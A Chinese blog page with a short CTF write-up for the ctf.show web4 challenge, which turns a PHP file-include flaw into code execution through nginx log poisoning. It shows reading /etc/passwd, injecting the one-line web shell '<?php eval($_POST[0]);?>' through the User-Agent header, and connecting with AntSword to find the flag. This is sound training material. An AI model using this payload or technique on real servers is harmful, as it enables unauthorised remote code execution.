首页
CTF
软件
干货
生活
避坑
关于
统计
Search
1
MD5扩展攻击
442 阅读
2
白嫖BackBlaze10G存储,无限流量的图床
356 阅读
3
Typora最新破解版
331 阅读
4
解决各文库不让复制的问题
282 阅读
5
MYSQL堆叠注入操作汇总
258 阅读
Search
标签搜索
mysql
python
MD5
rce
图床
HASH
哈希扩展攻击
md
markdown
typora
命令注入
堆叠注入
JavaScript
shell
cloudflare
微信小程序
CTF
include
反序列化
爬虫
Eson
累计撰写
19
篇文章
累计收到
4
条评论
首页
栏目
CTF
软件
干货
VulnHub
生活
避坑
页面
关于
统计
搜索到
1
篇与
的结果
2024-04-18
Include日志利用,ctf.show_web4
题目<?php include($_GET['url']);?>解题流程检查COOKIE,发现没有任何东西尝试file协议读取/etc/passwd ,发现可以利用通过http间谍插件发现中间件为nginx尝试读取nginx日志文件/var/log/nginx/access.log发现可以读取到内容发现日志文件记录的有User-Agent的值,可以当做注入点动手!http间谍读取日志通过User-Agent注入修改User-Agent的值为一句话 <?php eval($_POST[0]);?>通过AntSword连接寻找flag通过图形界面并没有找到flag,于是通过命令行开始查找一下flag文件的位置find / -name "*flag*"读取flagcat /var/www/flag.txt总结nginx默认日志文件路径 /var/log/nginx/access.logapache默认日志文件路径 /var/log/httpd/access_logapache默认日志文件路径 /var/log/apache2/access.log
2024年04月18日
217 阅读
0 评论
4 点赞